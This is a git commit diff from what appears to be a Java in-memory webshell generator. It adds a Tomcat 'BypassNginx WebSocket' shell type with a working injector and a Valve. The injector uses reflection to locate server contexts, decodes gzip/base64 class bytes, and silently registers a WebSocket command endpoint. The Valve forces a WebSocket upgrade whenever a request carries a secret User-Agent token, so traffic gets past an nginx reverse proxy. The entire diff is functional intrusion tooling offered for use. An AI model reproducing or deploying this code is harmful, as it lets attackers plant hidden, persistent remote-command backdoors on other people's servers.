feat: support Tomcat Command WebSocketBypassNginx

This commit is contained in:
ReaJason
2026-01-18 23:49:41 +08:00
parent 8458becfbc
commit 5b5c225edb
23 changed files with 849 additions and 53 deletions
@@ -5,6 +5,7 @@ import com.reajason.javaweb.memshell.config.InjectorConfig;
import com.reajason.javaweb.memshell.config.ShellConfig;
import com.reajason.javaweb.memshell.config.ShellToolConfig;
import com.reajason.javaweb.memshell.generator.InjectorGenerator;
import com.reajason.javaweb.memshell.generator.WebSocketByPassHelperGenerator;
import com.reajason.javaweb.memshell.server.AbstractServer;
import com.reajason.javaweb.probe.ProbeContent;
import com.reajason.javaweb.probe.ProbeMethod;
@@ -63,6 +64,11 @@ public class MemShellGenerator {
injectorConfig.setShellClassName(shellToolConfig.getShellClassName());
injectorConfig.setShellClassBytes(shellBytes);
if (ShellType.BYPASS_NGINX_WEBSOCKET.equals(shellConfig.getShellType())
|| ShellType.JAKARTA_BYPASS_NGINX_WEBSOCKET.equals(shellConfig.getShellType())) {
injectorConfig.setHelperClassBytes(WebSocketByPassHelperGenerator.getBytes(shellConfig, shellToolConfig));
}
InjectorGenerator injectorGenerator = new InjectorGenerator(shellConfig, injectorConfig);
byte[] injectorBytes = injectorGenerator.generate();
if (shellConfig.isProbe() && !shellConfig.getShellType().startsWith(ShellType.AGENT)) {
@@ -60,6 +60,8 @@ public class ServerFactory {
.addShellClass(JAKARTA_PROXY_VALVE, Godzilla.class)
.addShellClass(WEBSOCKET, GodzillaWebSocket.class)
.addShellClass(JAKARTA_WEBSOCKET, GodzillaWebSocket.class)
.addShellClass(BYPASS_NGINX_WEBSOCKET, GodzillaWebSocket.class)
.addShellClass(JAKARTA_BYPASS_NGINX_WEBSOCKET, GodzillaWebSocket.class)
.addShellClass(SPRING_WEBMVC_INTERCEPTOR, GodzillaInterceptor.class)
.addShellClass(SPRING_WEBMVC_JAKARTA_INTERCEPTOR, GodzillaInterceptor.class)
.addShellClass(SPRING_WEBMVC_CONTROLLER_HANDLER, GodzillaControllerHandler.class)
@@ -137,6 +139,8 @@ public class ServerFactory {
.addShellClass(JAKARTA_PROXY_VALVE, Command.class)
.addShellClass(WEBSOCKET, CommandWebSocket.class)
.addShellClass(JAKARTA_WEBSOCKET, CommandWebSocket.class)
.addShellClass(BYPASS_NGINX_WEBSOCKET, CommandWebSocket.class)
.addShellClass(JAKARTA_BYPASS_NGINX_WEBSOCKET, CommandWebSocket.class)
.addShellClass(UPGRADE, CommandUpgrade.class)
.addShellClass(SPRING_WEBMVC_INTERCEPTOR, CommandInterceptor.class)
.addShellClass(SPRING_WEBMVC_JAKARTA_INTERCEPTOR, CommandInterceptor.class)
@@ -45,7 +45,9 @@ public class ShellType {
public static final String SPRING_WEBFLUX_HANDLER_METHOD = "HandlerMethod";
public static final String SPRING_WEBFLUX_HANDLER_FUNCTION = "HandlerFunction";
public static final String WEBSOCKET = "WebSocket";
public static final String BYPASS_NGINX_WEBSOCKET = "BypassNginx" + WEBSOCKET;
public static final String JAKARTA_WEBSOCKET = "JakartaWebSocket";
public static final String JAKARTA_BYPASS_NGINX_WEBSOCKET = "JakartaWebBypassNginx" + WEBSOCKET;
public static final String ACTION = "Action";
}
@@ -22,6 +22,18 @@ public class CommandConfig extends ShellToolConfig {
@Builder.Default
private String paramName = CommonUtil.getRandomString(8);
/**
* 只有在 WebSocket Bypass 的时候才有用,防止对业务的干扰
*/
@Builder.Default
private String headerName = "User-Agent";
/**
* 只有在 WebSocket Bypass 的时候才有用,防止对业务的干扰
*/
@Builder.Default
private String headerValue = CommonUtil.getRandomString(8);
/**
* 加密器
*/
@@ -48,6 +60,22 @@ public class CommandConfig extends ShellToolConfig {
}
return self();
}
public B headerName(final String headerName) {
if (StringUtils.isNotBlank(headerName)) {
this.headerName$value = headerName;
headerName$set = true;
}
return self();
}
public B headerValue(final String headerValue) {
if (StringUtils.isNotBlank(headerValue)) {
this.headerValue$value = headerValue;
headerValue$set = true;
}
return self();
}
}
@@ -16,37 +16,38 @@ import net.bytebuddy.dynamic.DynamicType;
@AllArgsConstructor
@Builder(toBuilder = true)
public class InjectorConfig {
/**
* 注入器 Builder
*/
DynamicType.Builder<?> injectorBuilder;
/**
* 内存马 Builder
*/
DynamicType.Builder<?> shellBuilder;
/**
* 注入器模板类
*/
private Class<?> injectorClass;
/**
* 注入器类名
*/
@Builder.Default
private String injectorClassName = CommonUtil.generateInjectorClassName();
/**
* 注入访问的地址
*/
@Builder.Default
private String urlPattern = "/*";
/**
* 内存马类名
*/
private String shellClassName;
/**
* 内存马类字节
*/
private byte[] shellClassBytes;
/**
* 辅助类字节码
*/
private byte[] helperClassBytes;
/**
* 添加静态代码块调用构造方法初始化
*/
@@ -49,6 +49,12 @@ public class InjectorGenerator {
.method(named("getBase64String")).intercept(FixedValue.value(base64String))
.method(named("getClassName")).intercept(FixedValue.value(injectorConfig.getShellClassName()));
byte[] helperClassBytes = injectorConfig.getHelperClassBytes();
if (helperClassBytes != null) {
String helperBase64 = Base64.getEncoder().encodeToString(CommonUtil.gzipCompress(helperClassBytes));
builder = builder.method(named("getHelperBase64String")).intercept(FixedValue.value(helperBase64));
}
if (shellConfig.needByPassJavaModule()) {
builder = ByPassJavaModuleInterceptor.extend(builder);
}
@@ -0,0 +1,56 @@
package com.reajason.javaweb.memshell.generator;
import com.reajason.javaweb.ClassBytesShrink;
import com.reajason.javaweb.GenerationException;
import com.reajason.javaweb.Server;
import com.reajason.javaweb.buddy.ServletRenameVisitorWrapper;
import com.reajason.javaweb.buddy.TargetJreVersionVisitorWrapper;
import com.reajason.javaweb.memshell.config.CommandConfig;
import com.reajason.javaweb.memshell.config.GodzillaConfig;
import com.reajason.javaweb.memshell.config.ShellConfig;
import com.reajason.javaweb.memshell.config.ShellToolConfig;
import com.reajason.javaweb.memshell.shelltool.wsbypass.TomcatWsBypassValve;
import com.reajason.javaweb.utils.CommonUtil;
import net.bytebuddy.ByteBuddy;
import net.bytebuddy.dynamic.DynamicType;
import org.apache.commons.lang3.tuple.Pair;
import static net.bytebuddy.matcher.ElementMatchers.named;
/**
* @author ReaJason
* @since 2026/1/13
*/
public class WebSocketByPassHelperGenerator {
public static byte[] getBytes(ShellConfig shellConfig, ShellToolConfig shellToolConfig) {
Pair<String, String> headerPair = getHeaderPair(shellToolConfig);
if (headerPair == null) {
throw new GenerationException("unsupported shell config: " + shellConfig.getShellTool());
}
if (Server.Tomcat.equals(shellConfig.getServer())) {
DynamicType.Builder<TomcatWsBypassValve> builder = new ByteBuddy()
.redefine(TomcatWsBypassValve.class)
.visit(new TargetJreVersionVisitorWrapper(shellConfig.getTargetJreVersion()))
.field(named("headerName")).value(headerPair.getKey())
.field(named("headerValue")).value(headerPair.getValue())
.name(CommonUtil.generateClassName());
if (shellConfig.isJakarta()) {
builder = builder.visit(ServletRenameVisitorWrapper.INSTANCE);
}
try (DynamicType.Unloaded<TomcatWsBypassValve> dynamicType = builder.make()) {
return ClassBytesShrink.shrink(dynamicType.getBytes(), shellConfig.isShrink());
}
}
return null;
}
private static Pair<String, String> getHeaderPair(ShellToolConfig shellToolConfig) {
if (shellToolConfig instanceof CommandConfig) {
return Pair.of(((CommandConfig) shellToolConfig).getHeaderName(), ((CommandConfig) shellToolConfig).getHeaderValue());
} else if (shellToolConfig instanceof GodzillaConfig) {
return Pair.of(((GodzillaConfig) shellToolConfig).getHeaderName(), ((GodzillaConfig) shellToolConfig).getHeaderValue());
}
return null;
}
}
@@ -0,0 +1,286 @@
package com.reajason.javaweb.memshell.injector.tomcat;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.PrintStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.*;
import java.util.zip.GZIPInputStream;
/**
* @author ReaJason
* @since 2026/1/13
*/
public class TomcatWebSocketByPassInjector {
private static String msg = "";
private static boolean ok = false;
public String getUrlPattern() {
return "{{urlPattern}}";
}
public String getClassName() {
return "{{className}}";
}
public String getBase64String() {
return "{{base64Str}}";
}
public String getHelperBase64String() {
return "{{helperBase64String}}";
}
public TomcatWebSocketByPassInjector() {
if (ok) {
return;
}
Set<Object> contexts = null;
try {
contexts = getContext();
} catch (Throwable throwable) {
msg += "context error: " + getErrorMessage(throwable);
}
if (contexts == null || contexts.isEmpty()) {
msg += "context not found";
} else {
for (Object context : contexts) {
try {
msg += ("context: [" + getContextRoot(context) + "] ");
Object shell = getShell(context);
inject(context, shell);
msg += "[" + getUrlPattern() + "] ready\n";
} catch (Throwable e) {
msg += "failed " + getErrorMessage(e) + "\n";
}
}
}
ok = true;
System.out.println(msg);
}
public Set<Object> getContext() throws Exception {
Set<Object> contexts = new HashSet<Object>();
Set<Thread> threads = Thread.getAllStackTraces().keySet();
for (Thread thread : threads) {
String threadName = thread.getName();
if (threadName.contains("ContainerBackgroundProcessor")) {
Map<?, ?> childrenMap = (Map<?, ?>) getFieldValue(getFieldValue(getFieldValue(thread, "target"), "this$0"), "children");
for (Object value : childrenMap.values()) {
Map<?, ?> children = (Map<?, ?>) getFieldValue(value, "children");
contexts.addAll(children.values());
}
} else if (threadName.contains("Poller") && !threadName.contains("ajp")) {
try {
Object proto = getFieldValue(getFieldValue(getFieldValue(getFieldValue(thread, "target"), "this$0"), "handler"), "proto");
Object engine = getFieldValue(getFieldValue(getFieldValue(getFieldValue(proto, "adapter"), "connector"), "service"), "engine");
Map<?, ?> childrenMap = (Map<?, ?>) getFieldValue(engine, "children");
for (Object value : childrenMap.values()) {
Map<?, ?> children = (Map<?, ?>) getFieldValue(value, "children");
contexts.addAll(children.values());
}
} catch (Exception ignored) {
}
} else if (thread.getContextClassLoader() != null) {
String name = thread.getContextClassLoader().getClass().getSimpleName();
if (name.matches(".+WebappClassLoader")) {
Object resources = getFieldValue(thread.getContextClassLoader(), "resources");
// need WebResourceRoot not DirContext
if (resources != null && resources.getClass().getName().endsWith("Root")) {
Object context = getFieldValue(resources, "context");
contexts.add(context);
}
}
}
}
return contexts;
}
@SuppressWarnings("all")
private String getContextRoot(Object context) {
String r = null;
try {
r = (String) invokeMethod(invokeMethod(context, "getServletContext", null, null), "getContextPath", null, null);
} catch (Exception ignored) {
}
String c = context.getClass().getName();
if (r == null) {
return c;
}
if (r.isEmpty()) {
return c + "(/)";
}
return c + "(" + r + ")";
}
private ClassLoader getWebAppClassLoader(Object context) {
try {
return ((ClassLoader) invokeMethod(context, "getClassLoader", null, null));
} catch (Exception e) {
Object loader = invokeMethod(context, "getLoader", null, null);
return ((ClassLoader) invokeMethod(loader, "getClassLoader", null, null));
}
}
@SuppressWarnings("all")
private Object getShell(Object context) throws Exception {
ClassLoader classLoader = getWebAppClassLoader(context);
Class<?> clazz = null;
try {
clazz = classLoader.loadClass(getClassName());
} catch (Exception e) {
clazz = defineShell(classLoader, getBase64String());
}
msg += "[" + classLoader.getClass().getName() + "] ";
return clazz.newInstance();
}
private Class<?> defineShell(ClassLoader classLoader, String base64) throws Exception {
byte[] clazzByte = gzipDecompress(decodeBase64(base64));
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
defineClass.setAccessible(true);
return ((Class<?>) defineClass.invoke(classLoader, clazzByte, 0, clazzByte.length));
}
@SuppressWarnings("unchecked")
private void inject(Object context, Object obj) throws Exception {
Object servletContext = invokeMethod(context, "getServletContext", null, null);
Object container = invokeMethod(servletContext, "getAttribute", new Class[]{String.class}, new Object[]{"javax.websocket.server.ServerContainer"});
if (container == null) {
container = invokeMethod(servletContext, "getAttribute", new Class[]{String.class}, new Object[]{"jakarta.websocket.server.ServerContainer"});
}
if (container == null) {
throw new RuntimeException("container is null");
}
if (invokeMethod(container, "findMapping", new Class[]{String.class}, new Object[]{getUrlPattern()}) != null) {
return;
}
Object valve = defineShell(context.getClass().getClassLoader(), getHelperBase64String()).newInstance();
Object pipeline = invokeMethod(context, "getPipeline", null, null);
Class valveClass = context.getClass().getClassLoader().loadClass("org.apache.catalina.Valve");
invokeMethod(pipeline, "addValve", new Class[]{valveClass}, new Object[]{valve});
ClassLoader contextClassLoader = context.getClass().getClassLoader();
Class<?> serverEndpointConfigClass;
Class<?> builderClass;
try {
serverEndpointConfigClass = contextClassLoader.loadClass("javax.websocket.server.ServerEndpointConfig");
builderClass = contextClassLoader.loadClass("javax.websocket.server.ServerEndpointConfig$Builder");
} catch (ClassNotFoundException e) {
serverEndpointConfigClass = contextClassLoader.loadClass("jakarta.websocket.server.ServerEndpointConfig");
builderClass = contextClassLoader.loadClass("jakarta.websocket.server.ServerEndpointConfig$Builder");
}
Constructor<?> constructor = builderClass.getDeclaredConstructor(Class.class, String.class);
constructor.setAccessible(true);
Object o1 = constructor.newInstance(obj.getClass(), getUrlPattern());
Object endpointConfig = invokeMethod(o1, "build", null, null);
invokeMethod(container, "setDefaultMaxTextMessageBufferSize", new Class[]{int.class}, new Object[]{52428800});
invokeMethod(container, "setDefaultMaxBinaryMessageBufferSize", new Class[]{int.class}, new Object[]{52428800});
invokeMethod(container, "addEndpoint", new Class[]{serverEndpointConfigClass}, new Object[]{endpointConfig});
}
@Override
public String toString() {
return msg;
}
@SuppressWarnings("all")
public static byte[] decodeBase64(String base64Str) throws Exception {
Class<?> decoderClass;
try {
decoderClass = Class.forName("java.util.Base64");
Object decoder = decoderClass.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str);
} catch (Exception ignored) {
decoderClass = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) decoderClass.getMethod("decodeBuffer", String.class).invoke(decoderClass.newInstance(), base64Str);
}
}
@SuppressWarnings("all")
public static byte[] gzipDecompress(byte[] compressedData) throws IOException {
ByteArrayOutputStream out = new ByteArrayOutputStream();
GZIPInputStream gzipInputStream = null;
try {
gzipInputStream = new GZIPInputStream(new ByteArrayInputStream(compressedData));
byte[] buffer = new byte[4096];
int n;
while ((n = gzipInputStream.read(buffer)) > 0) {
out.write(buffer, 0, n);
}
return out.toByteArray();
} finally {
if (gzipInputStream != null) {
gzipInputStream.close();
}
out.close();
}
}
@SuppressWarnings("all")
public static Object invokeMethod(Object obj, String methodName, Class<?>[] paramClazz, Object[] param) {
try {
Class<?> clazz = (obj instanceof Class) ? (Class<?>) obj : obj.getClass();
Method method = null;
while (clazz != null && method == null) {
try {
if (paramClazz == null) {
method = clazz.getDeclaredMethod(methodName);
} else {
method = clazz.getDeclaredMethod(methodName, paramClazz);
}
} catch (NoSuchMethodException e) {
clazz = clazz.getSuperclass();
}
}
if (method == null) {
throw new NoSuchMethodException("Method not found: " + methodName);
}
method.setAccessible(true);
return method.invoke(obj instanceof Class ? null : obj, param);
} catch (Exception e) {
throw new RuntimeException("Error invoking method: " + methodName, e);
}
}
@SuppressWarnings("all")
public static Object getFieldValue(Object obj, String name) throws Exception {
Class<?> clazz = obj.getClass();
while (clazz != Object.class) {
try {
Field field = clazz.getDeclaredField(name);
field.setAccessible(true);
return field.get(obj);
} catch (NoSuchFieldException var5) {
clazz = clazz.getSuperclass();
}
}
throw new NoSuchFieldException(obj.getClass().getName() + " Field not found: " + name);
}
@SuppressWarnings("all")
private String getErrorMessage(Throwable throwable) {
PrintStream printStream = null;
try {
ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
printStream = new PrintStream(outputStream);
throwable.printStackTrace(printStream);
return outputStream.toString();
} finally {
if (printStream != null) {
printStream.close();
}
}
}
}
@@ -46,6 +46,8 @@ public class Tomcat extends AbstractServer {
.addInjector(CATALINA_AGENT_CONTEXT_VALVE, TomcatContextValveAgentInjector.class)
.addInjector(WEBSOCKET, TomcatWebSocketInjector.class)
.addInjector(JAKARTA_WEBSOCKET, TomcatWebSocketInjector.class)
.addInjector(BYPASS_NGINX_WEBSOCKET, TomcatWebSocketByPassInjector.class)
.addInjector(JAKARTA_BYPASS_NGINX_WEBSOCKET, TomcatWebSocketByPassInjector.class)
.addInjector(UPGRADE, TomcatUpgradeInjector.class)
.build();
}
@@ -0,0 +1,99 @@
package com.reajason.javaweb.memshell.shelltool.wsbypass;
import org.apache.catalina.Valve;
import org.apache.catalina.connector.Request;
import org.apache.catalina.connector.Response;
import javax.servlet.ServletException;
import java.io.IOException;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
/**
* @author ReaJason
* @since 2026/1/13
*/
public class TomcatWsBypassValve implements Valve {
public static String headerName;
public static String headerValue;
@Override
public void invoke(Request request, Response response) throws IOException, ServletException {
try {
if (request.getHeader(headerName) != null
&& request.getHeader(headerName).contains(headerValue)) {
String pathInfo = request.getPathInfo();
String path;
if (pathInfo == null) {
path = request.getServletPath();
} else {
path = request.getServletPath() + pathInfo;
}
Object sc = request.getServletContext().getAttribute("javax.websocket.server.ServerContainer");
if (sc == null) {
sc = request.getServletContext().getAttribute("jakarta.websocket.server.ServerContainer");
}
if (sc == null) {
throw new ServletException("Server container not found");
}
addHeader(request, "Connection", "upgrade");
addHeader(request, "Sec-WebSocket-Version", "13");
addHeader(request, "Upgrade", "websocket");
Object mappingResult = sc.getClass().getMethod("findMapping", String.class).invoke(sc, path);
Class<?> upgradeUtil = Class.forName("org.apache.tomcat.websocket.server.UpgradeUtil");
for (Method method : upgradeUtil.getMethods()) {
if ("doUpgrade".equals(method.getName())) {
method.invoke(null, sc, request, response, getFieldValue(mappingResult, "config"), getFieldValue(mappingResult, "pathParams"));
}
}
return;
}
} catch (Throwable e) {
e.printStackTrace();
}
this.getNext().invoke(request, response);
}
private Object getFieldValue(Object obj, String fieldName) throws Exception {
Field declaredField = obj.getClass().getDeclaredField(fieldName);
declaredField.setAccessible(true);
return declaredField.get(obj);
}
private void addHeader(Request request, String key, String value) {
try {
Field coyoteRequestField = request.getClass().getDeclaredField("coyoteRequest");
coyoteRequestField.setAccessible(true);
Object coyoteRequest = coyoteRequestField.get(request);
Method getMimeHeadersMethod = coyoteRequest.getClass().getMethod("getMimeHeaders");
Object mimeHeaders = getMimeHeadersMethod.invoke(coyoteRequest);
Method addValueMethod = mimeHeaders.getClass().getMethod("addValue", String.class);
Object messageBytes = addValueMethod.invoke(mimeHeaders, key);
Method setStringMethod = messageBytes.getClass().getMethod("setString", String.class);
setStringMethod.invoke(messageBytes, value);
} catch (Exception e) {
e.printStackTrace();
}
}
Valve next;
@Override
public Valve getNext() {
return this.next;
}
@Override
public void setNext(Valve valve) {
this.next = valve;
}
@Override
public boolean isAsyncSupported() {
return false;
}
@Override
public void backgroundProcess() {
}
}